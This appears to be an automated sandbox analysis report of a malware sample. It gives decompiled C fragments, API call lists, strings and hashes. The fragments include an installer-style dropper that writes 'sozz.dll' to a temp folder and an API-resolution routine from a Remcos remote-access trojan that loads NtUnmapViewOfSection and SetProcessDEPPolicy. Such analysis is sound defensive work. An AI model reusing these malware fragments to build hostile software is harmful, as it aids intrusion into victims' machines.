                                                                                                • Opcode Fuzzy Hash: 8cb4e7f5c6ab999f47dd7d428398fb9a34f763d951fb3a4f5dbf986d62a0fd60
                                                                                                • Instruction Fuzzy Hash: 9A011EB6600149BBE704DFDCDC51EBB77ADAB89744F048418FA198B281E671EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA6280(signed int _a4, signed char* _a8) {
                                                                                                
                                                                                                				0x6eda0000("(%p, %p)\n", _a4, _a8);
                                                                                                				if(( *_a8 & 0x000000ff) == 0x1c) {
                                                                                                					E6EDAD650(0x1c, _a4, _a8);
                                                                                                					E6EDADE30(0x1c, _a4, _a8, 1);
                                                                                                					return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                			}




                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA62CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: 382a076d46354e032349163fc180fb16281b90d9ed4b05e985b8f6bfdf7a499b
                                                                                                • Instruction ID: 611148225bbc2a862ff201ee4ca910dece4dc55dc93deb667e6311c1e3ba4a6b
                                                                                                • Opcode Fuzzy Hash: 382a076d46354e032349163fc180fb16281b90d9ed4b05e985b8f6bfdf7a499b
                                                                                                • Instruction Fuzzy Hash: CC015E75640108ABEB04DF9CD851EEE376ADB99754F00C014FE588F381E671EA418BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA6490(signed int _a4, signed char* _a8) {
                                                                                                
                                                                                                				0x6eda0000("(%p,%p)\n", _a4, _a8);
                                                                                                				if(( *_a8 & 0x000000ff) == 0x21) {
                                                                                                					E6EDAD650(0x21, _a4, _a8);
                                                                                                					E6EDADE30(0x21, _a4, _a8, 1);
                                                                                                					return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}




                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA64DE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2571520743
                                                                                                • Opcode ID: cfa5eee78bd3168616b5ef954077adcba6f38037bbb343ced54ac56bc024fc8c
                                                                                                • Instruction ID: f266ff4db73936569c457debf89fd785ea5c08a615fcba709417f40ead1f8f71
                                                                                                • Opcode Fuzzy Hash: cfa5eee78bd3168616b5ef954077adcba6f38037bbb343ced54ac56bc024fc8c
                                                                                                • Instruction Fuzzy Hash: 54017C75A00104BFD704DFD8D851EEA376AAB99345F00C014FE188F282E671EA818BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4A13
                                                                                                • NDRCContextUnmarshall.RPCRT4(?,?,?,?), ref: 6EDA4A31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall
                                                                                                • String ID: (%p, %p, %p)
                                                                                                • API String ID: 3324431081-3304478213
                                                                                                • Opcode ID: 889f1e18df30c9a4746532064e461242bc8349853658cc08e6a224d794c06248
                                                                                                • Instruction ID: 55931839bc5d84f40f87888b637d8aaf19b7b5bfacfcb8dda422fd271d73507d
                                                                                                • Opcode Fuzzy Hash: 889f1e18df30c9a4746532064e461242bc8349853658cc08e6a224d794c06248
                                                                                                • Instruction Fuzzy Hash: 6F0100B5200104EFDB04CF98C890E5A7BAAAF88758B14C108FA499B386D731F951CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA61F0(signed int _a4, signed char* _a8) {
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				0x6eda0000("(%p,%p)\n", _a4, _a8);
                                                                                                				_t32 = _t31 + 0xc;
                                                                                                				if(( *_a8 & 0x000000ff) != 0x1b) {
                                                                                                					0x6eda0000("invalid format = 0x%x\n",  *_a8 & 0x000000ff);
                                                                                                					_t32 = _t32 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				E6EDAD650(0x1b, _a4, _a8);
                                                                                                				E6EDADE30(0x1b, _a4, _a8, 1);
                                                                                                				return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA623E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-4147536467
                                                                                                • Opcode ID: d48065e3b410e875e423116625b53dfc3fc8123af1783d5b2a8b66cbf8d3459d
                                                                                                • Instruction ID: ea670f6c67ec70fe4c4f26ea8ba2bcc8ad7890d7a15ea9fb6d90d2d8a3f8bd3e
                                                                                                • Opcode Fuzzy Hash: d48065e3b410e875e423116625b53dfc3fc8123af1783d5b2a8b66cbf8d3459d
                                                                                                • Instruction Fuzzy Hash: 24018F75600008BBEB04DFD8D841EEA376ADB88344F00C029FE198F281E671EA418BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA89DE
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA89AB
                                                                                                • invalid format type %x, xrefs: 6EDA89CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: ef84473e9f903c8bec1a6b6bf8d90a70640414a96ff17251187d6e33eaedc7c9
                                                                                                • Instruction ID: 8179aea6e8dac38653dfc61b79a411115735419ddfc12c67041db35b78bfedd6
                                                                                                • Opcode Fuzzy Hash: ef84473e9f903c8bec1a6b6bf8d90a70640414a96ff17251187d6e33eaedc7c9
                                                                                                • Instruction Fuzzy Hash: 4501A7B5908388BFC740DFE8C850DAE7FB99F9A245F048498F9999F241E6319714CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8A5E
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8A2B
                                                                                                • invalid format type %x, xrefs: 6EDA8A4C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: f1437e807f4434eb65123670a24cfe1426587f750c67dbd9b856edc4f59aaf67
                                                                                                • Instruction ID: c7f1af56a7dd2fb722d0cc9aa1f461e09f33473cc1d708b753e2f39406a07d34
                                                                                                • Opcode Fuzzy Hash: f1437e807f4434eb65123670a24cfe1426587f750c67dbd9b856edc4f59aaf67
                                                                                                • Instruction Fuzzy Hash: 7801A7B5904288AFC740CFE9C854EAE7FB99F89241F00C488FD558B341E631A724CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6E02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format type %x
                                                                                                • API String ID: 3997070919-814374321
                                                                                                • Opcode ID: 2ad4d22c3dcb19a526ec0c82f6d672a68cbfec5ad99033f152df0fd1ec1c7114
                                                                                                • Instruction ID: 5fb1062c2713ac955cc571fa3045e690a8b1471580ceda78a69e28f85a3b4134
                                                                                                • Opcode Fuzzy Hash: 2ad4d22c3dcb19a526ec0c82f6d672a68cbfec5ad99033f152df0fd1ec1c7114
                                                                                                • Instruction Fuzzy Hash: DD0181B5640145ABE704CFDCCC51FAF376DAB48700F008418FA158F281E671EA5087B2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA6D82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: 7e254487deaec9efa6a3ad592be75035e80c793dc607b113ef645581cbecb3ef
                                                                                                • Instruction ID: 7caba3df236cbd3b5aee00600639f3ff681219595ace79f71672144861f238f5
                                                                                                • Opcode Fuzzy Hash: 7e254487deaec9efa6a3ad592be75035e80c793dc607b113ef645581cbecb3ef
                                                                                                • Instruction Fuzzy Hash: 86F0A4B2640105ABD704DFDCDC51FFB776DAB48740F04841CFA158B281E671EA5087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA87E0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				void* _t21;
                                                                                                				void* _t22;
                                                                                                
                                                                                                				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff);
                                                                                                				_t22 = _t21 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					_t22 = _t22 + 8;
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                				}
                                                                                                				E6EDA73B0(_a4 + 0x14, 4);
                                                                                                				return E6EDAAF50(_a4, 0x14);
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8823
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA87F2
                                                                                                • invalid format type %x, xrefs: 6EDA8811
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: 2002dbde3d4f4494b86a9d2d13b8aba7a4f5a48145a7150bfdda8c43e904291a
                                                                                                • Instruction ID: 7b2b3d10b4c6e197d525303e56b5556a36e33c541f1352b17444650188783777
                                                                                                • Opcode Fuzzy Hash: 2002dbde3d4f4494b86a9d2d13b8aba7a4f5a48145a7150bfdda8c43e904291a
                                                                                                • Instruction Fuzzy Hash: C7F096F5504284ABDB00CFE8EC51EAE376D5F9564AF048445FF584F285E631E62087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                                				int _t5;
                                                                                                				long _t7;
                                                                                                				struct _OVERLAPPED* _t11;
                                                                                                				intOrPtr* _t15;
                                                                                                				void* _t17;
                                                                                                				int _t21;
                                                                                                
                                                                                                				_t15 = __esi;
                                                                                                				_t11 = __ebx;
                                                                                                				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                                                					_t7 = lstrlenA(E004029E8(0x11));
                                                                                                				} else {
                                                                                                					E004029CB(1);
                                                                                                					 *0x409f78 = __al;
                                                                                                				}
                                                                                                				if( *_t15 == _t11) {
                                                                                                					L8:
                                                                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                                				} else {
                                                                                                					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll", _t7, _t17 + 8, _t11);
                                                                                                					_t21 = _t5;
                                                                                                					if(_t21 == 0) {
                                                                                                						goto L8;
                                                                                                					}
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                                                                                                				return 0;
                                                                                                			}










                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll, xrefs: 004024BC, 004024E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FileWritelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll
                                                                                                • API String ID: 427699356-647133380
                                                                                                • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                                • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                                                                                • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                                                                                • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405465(char* _a4) {
                                                                                                				char* _t3;
                                                                                                				char* _t5;
                                                                                                
                                                                                                				_t5 = _a4;
                                                                                                				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                				while( *_t3 != 0x5c) {
                                                                                                					_t3 = CharPrevA(_t5, _t3);
                                                                                                					if(_t3 > _t5) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					break;
                                                                                                				}
                                                                                                				 *_t3 =  *_t3 & 0x00000000;
                                                                                                				return  &(_t3[1]);
                                                                                                			}






                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 0040546B
                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-224404859
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405577(CHAR* _a4, CHAR* _a8) {
                                                                                                				int _t10;
                                                                                                				int _t15;
                                                                                                				CHAR* _t16;
                                                                                                
                                                                                                				_t15 = lstrlenA(_a8);
                                                                                                				_t16 = _a4;
                                                                                                				while(lstrlenA(_t16) >= _t15) {
                                                                                                					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                                					_t10 = lstrcmpiA(_t16, _a8);
                                                                                                					if(_t10 == 0) {
                                                                                                						return _t16;
                                                                                                					}
                                                                                                					_t16 = CharNextA(_t16);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}







                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                                                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Executed Functions

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.682805273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: #100
                                                                                                • String ID: VB5!6&*
                                                                                                • API String ID: 1341478452-3593831657
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Executed Functions

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040CD53() {
                                                                                                				struct HINSTANCE__* _t1;
                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                
                                                                                                				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                                                                                				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                                                                                				 *0x46dd20 = _t2;
                                                                                                				if(_t2 == 0) {
                                                                                                					 *0x46dd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                                                                                				}
                                                                                                				 *0x46dd10 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                                                                                				if( *0x46dd20 == 0) {
                                                                                                					 *0x46dd10 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                                                                                				}
                                                                                                				 *0x46dd18 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                                                                                                				 *0x46dd04 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                                                                                				 *0x46dea0 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                                				 *0x46dea4 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                                                                                				 *0x46dd14 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                                                                                                				 *0x46dd08 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                                                                                				 *0x46dd24 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                                                                                				 *0x46dd28 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                                                                                				 *0x46dd0c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                                                                                				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                                                                                				 *0x46dd00 = _t24;
                                                                                                				return _t24;
                                                                                                			}







                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Remcos-36FQQT,00000001,0040C529), ref: 0040CD66
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CD6F
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD8A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CD8D
                                                                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD9E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDA1
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CDBB
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDBE
                                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CDCF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDD2
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CDE3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDE6
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDF7
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CDFA
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CE0B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE0E
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CE1F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE22
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CE33
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE36
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CE47
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE4A
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE5B
